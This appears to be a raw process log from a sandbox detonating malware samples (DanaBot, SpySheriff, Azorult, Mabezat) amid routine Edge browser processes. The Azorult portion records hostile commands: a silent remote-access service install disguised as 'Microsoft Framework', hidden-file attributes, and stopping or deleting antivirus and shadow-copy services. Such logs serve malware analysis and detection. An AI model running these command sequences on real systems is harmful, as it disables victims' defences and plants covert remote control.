C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4252,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4364 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3940,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5176 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5176,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5216 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5212,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5384,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5240 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5900,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5824 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5900,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5824 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6064,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6052 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6216,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6192 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6232,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6196 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6324,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6352 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6560,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6556 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6720,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6732 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6712,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6228 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6892,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6888 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=6672,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6348 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6928,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6360 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=4408,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5904 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=4448,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4552 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=6880,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6852 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=6692,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7132,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7056 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7120,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6152 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7148,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=704 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=6500,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=2828,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5192 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=5428,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4424 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7076,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7408 /prefetch:8

C:\Users\Admin\Downloads\DanaBot.exe

"C:\Users\Admin\Downloads\DanaBot.exe"

C:\Users\Admin\Downloads\DanaBot.exe

"C:\Users\Admin\Downloads\DanaBot.exe"

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@5768

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@1324

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1324 -ip 1324

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5768 -ip 5768

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 472

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5768 -s 484

C:\Users\Admin\Downloads\DanaBot.exe

"C:\Users\Admin\Downloads\DanaBot.exe"

C:\Users\Admin\Downloads\DanaBot.exe

"C:\Users\Admin\Downloads\DanaBot.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7576,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7672 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4184 -ip 4184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 152

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5144 -ip 5144

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=7568,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=5140,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7124,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7928 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7620,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7972 /prefetch:8

C:\Users\Admin\Downloads\SpySheriff.exe

"C:\Users\Admin\Downloads\SpySheriff.exe"

C:\Users\Admin\Downloads\SpySheriff.exe

"C:\Users\Admin\Downloads\SpySheriff.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5752,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7984 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7644,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6580 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5200,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5108 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5276,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5236 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6076,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=5556,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=3820 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=7220,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4568 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6256,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7116 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3008,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7052 /prefetch:8

C:\Users\Admin\Downloads\Azorult.exe

"C:\Users\Admin\Downloads\Azorult.exe"

C:\Users\Admin\Downloads\Azorult.exe

"C:\Users\Admin\Downloads\Azorult.exe"

C:\ProgramData\Microsoft\Intel\wini.exe

C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"

C:\ProgramData\Windows\winit.exe

"C:\ProgramData\Windows\winit.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg1.reg"

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg2.reg"

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /silentinstall

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /firewall

C:\programdata\install\cheat.exe

C:\programdata\install\cheat.exe -pnaxui

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /start

C:\programdata\install\ink.exe

C:\programdata\install\ink.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appidsvc

C:\ProgramData\Windows\rutserv.exe

C:\ProgramData\Windows\rutserv.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appmgmt

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe /tray

C:\ProgramData\Microsoft\Intel\taskhost.exe

"C:\ProgramData\Microsoft\Intel\taskhost.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto

C:\Windows\SysWOW64\sc.exe

sc start appidsvc

C:\Windows\SysWOW64\sc.exe

sc config appidsvc start= auto

C:\programdata\microsoft\intel\P.exe

C:\programdata\microsoft\intel\P.exe

C:\Windows\SysWOW64\sc.exe

sc config appmgmt start= auto

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows\*.*

C:\Windows\SysWOW64\sc.exe

sc start appmgmt

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows

C:\Windows\SysWOW64\sc.exe

sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000

C:\Windows\SysWOW64\sc.exe

sc config RManService obj= LocalSystem type= interact type= own

C:\Windows\SysWOW64\sc.exe

sc config RManService DisplayName= "Microsoft Framework"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7968,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5652 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

C:\Windows\SysWOW64\sc.exe

sc delete swprv

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop mbamservice

C:\Windows\SysWOW64\sc.exe

sc stop mbamservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc stop bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc delete bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete mbamservice

C:\Windows\SysWOW64\sc.exe

sc delete mbamservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete crmsvc

C:\Windows\SysWOW64\sc.exe

sc delete crmsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete "windows node"

C:\Windows\SysWOW64\sc.exe

sc delete "windows node"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer

C:\Windows\SysWOW64\sc.exe

sc stop Adobeflashplayer

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop MoonTitle

C:\Windows\SysWOW64\sc.exe

sc delete AdobeFlashPlayer

C:\Windows\SysWOW64\sc.exe

sc stop MoonTitle

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete MoonTitle"

C:\Windows\SysWOW64\sc.exe

sc delete MoonTitle"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop AudioServer

C:\Windows\SysWOW64\sc.exe

sc stop AudioServer

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete AudioServer"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=5292,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7192 /prefetch:1

C:\Windows\SysWOW64\sc.exe

sc delete AudioServer"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=2720,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5452,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7068 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8052,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5124 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64

C:\Windows\SysWOW64\sc.exe

sc stop clr_optimization_v4.0.30318_64

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"

C:\ProgramData\Windows\rfusclient.exe

C:\ProgramData\Windows\rfusclient.exe /tray

C:\Windows\SysWOW64\sc.exe

sc delete clr_optimization_v4.0.30318_64"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql

C:\Windows\SysWOW64\sc.exe

sc stop MicrosoftMysql

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\sc.exe

sc delete MicrosoftMysql

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Users\Admin\Downloads\Mabezat.exe

